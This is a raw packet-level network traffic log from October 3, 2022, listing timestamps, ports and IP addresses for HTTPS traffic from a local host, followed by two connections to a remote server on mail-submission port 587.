Oct 3, 2022 16:13:31.670744896 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.672609091 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.672878981 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.675905943 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.676264048 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.678153038 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.678319931 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.678366899 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.678528070 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.678590059 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.678735018 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.678767920 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.678914070 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.678939104 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.678958893 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.679240942 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.679584980 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.679858923 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.679917097 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.680123091 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.680243969 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.680490971 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.680545092 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.680783987 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.681057930 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.681195021 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.681231022 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.681442976 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.681730032 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.681895018 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.681932926 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.682137012 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.682405949 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.682707071 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.682775021 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.683012962 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.683156013 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.683330059 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.683367014 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.683584929 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.683676004 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.683973074 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.684017897 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.684273958 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.684443951 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.684647083 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.684693098 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.684858084 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.685071945 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.685272932 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.685319901 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.685484886 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.685858965 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.686146975 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.686194897 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.686433077 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.686619997 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.686793089 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.686830997 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.687058926 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.687124014 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.687268019 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.687297106 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.687444925 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.687726974 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.687906027 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.687937975 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.688112974 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.688497066 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.688667059 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.688679934 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.688707113 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.688822031 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.688848972 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.689055920 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.689086914 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.689253092 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.689410925 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.689555883 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.689572096 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.689593077 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.689778090 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.689806938 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.689990044 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.690291882 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.690462112 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.690490961 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.690722942 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.690752029 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.690918922 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.690944910 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.690959930 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.691147089 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.691191912 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.691210985 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.691359043 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.691694021 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.691839933 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.691857100 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.691873074 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.692127943 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.692159891 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.692332983 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.692595005 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.692735910 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.692756891 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.692778111 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.692910910 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.692943096 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.693186998 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.693456888 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.693600893 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.693608999 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.693634987 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.693837881 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.693870068 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.694051027 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.694323063 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.694464922 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.694521904 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.694545984 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.694628000 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.694708109 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.694730997 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.694899082 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.694925070 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.695131063 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.695219040 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.695364952 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.695383072 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.695399046 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.695538044 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.695559025 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.695576906 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.695806026 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.696125031 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.696274042 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.696363926 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.696456909 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.696482897 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.696682930 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.696692944 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.697012901 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.697212934 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.697238922 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.697254896 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.697403908 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.697510958 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.697546005 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.697583914 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.697722912 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.697901011 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.698082924 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.698096991 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.698123932 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.698219061 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.698235989 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.698251963 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.698417902 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.698443890 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.698589087 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.698681116 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.698831081 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.698857069 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.698997974 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.699028015 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.699048996 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.699156046 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.699342966 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.699361086 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.699513912 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.699623108 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.699765921 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.699793100 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.699913025 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.699928999 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.699948072 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.700073004 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.700119019 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.700139046 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.700280905 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.700308084 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.700433969 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.700495958 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.700550079 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.700572014 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.700639009 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.700730085 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.700764894 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.700786114 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.700872898 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.700963020 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.700983047 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.700998068 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.701134920 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.701153994 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.701169014 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.701363087 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.701414108 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.701436043 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.701512098 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.701592922 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.701617956 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.701632023 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.701818943 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.701834917 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.701867104 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.702032089 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.702061892 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.702085018 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.702178955 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.702277899 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.702297926 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.702440023 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.702459097 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.702502012 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.702593088 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.702692986 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.702737093 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.702758074 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.702835083 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.702915907 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.702939987 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.703107119 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.703129053 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.703263998 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.703277111 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.703298092 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.703442097 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.703466892 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.703602076 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.703618050 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.703645945 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.703763008 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.703788996 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.703933954 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.703960896 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.704104900 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.704133034 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.704184055 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.704205990 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.704343081 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.704412937 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.704436064 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.704499960 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.704580069 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.704617977 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.704638958 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.704744101 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.704838037 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.704957008 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.705005884 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.705032110 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.705056906 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.705130100 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.705219984 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.705235004 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.705250025 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.705410957 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.705435991 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.705558062 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.705626011 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.705646992 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.705760956 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.705821991 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.705842018 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.705948114 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.705987930 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.706010103 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.706156969 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.706182957 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.706386089 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.706428051 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.706449986 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.706538916 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.706614971 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.706639051 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.706795931 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.706818104 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.706834078 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.706948996 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.707030058 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.707129002 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.707154989 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.707175016 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.707298994 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.707324982 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.707458019 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.707509041 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.707531929 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.707604885 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.707690001 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.707777023 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.707803011 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.707856894 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.707890987 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.707937956 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.707984924 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.708003044 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.708008051 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.708154917 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.708184958 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:54.416939020 CEST	49809	587	192.168.11.20	216.218.206.36
Oct 3, 2022 16:13:54.578177929 CEST	49810	587	192.168.11.20	216.218.206.36
Oct 3, 2022 16:13:54.598190069 CEST	587	49809	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:54.598372936 CEST	49809	587	192.168.11.20	216.218.206.36
Oct 3, 2022 16:13:54.759716988 CEST	587	49810	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:54.759915113 CEST	49810	587	192.168.11.20	216.218.206.36
Oct 3, 2022 16:13:55.021400928 CEST	587	49809	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:55.022090912 CEST	49809	587	192.168.11.20	216.218.206.36
Oct 3, 2022 16:13:55.022679090 CEST	587	49810	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:55.023272038 CEST	49810	587	192.168.11.20	216.218.206.36
Oct 3, 2022 16:13:55.203537941 CEST	587	49809	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:55.204047918 CEST	49809	587	192.168.11.20	216.218.206.36
Oct 3, 2022 16:13:55.204478979 CEST	587	49810	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:55.210037947 CEST	49810	587	192.168.11.20	216.218.206.36
Oct 3, 2022 16:13:55.387283087 CEST	587	49809	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:55.389974117 CEST	49809	587	192.168.11.20	216.218.206.36
Oct 3, 2022 16:13:55.393198967 CEST	587	49810	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:55.393687010 CEST	49810	587	192.168.11.20	216.218.206.36
Oct 3, 2022 16:13:55.575944901 CEST	587	49809	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:55.575982094 CEST	587	49809	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:55.576000929 CEST	587	49809	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:55.576011896 CEST	587	49809	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:55.576185942 CEST	49809	587	192.168.11.20	216.218.206.36
Oct 3, 2022 16:13:55.577370882 CEST	587	49809	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:55.579533100 CEST	587	49810	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:55.579560995 CEST	587	49810	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:55.579684973 CEST	587	49810	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:55.579699039 CEST	587	49810	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:55.579806089 CEST	49810	587	192.168.11.20	216.218.206.36
Oct 3, 2022 16:13:55.579828978 CEST	49810	587	192.168.11.20	216.218.206.36
Oct 3, 2022 16:13:55.580838919 CEST	587	49810	216.218.206.36	192.168.11.20
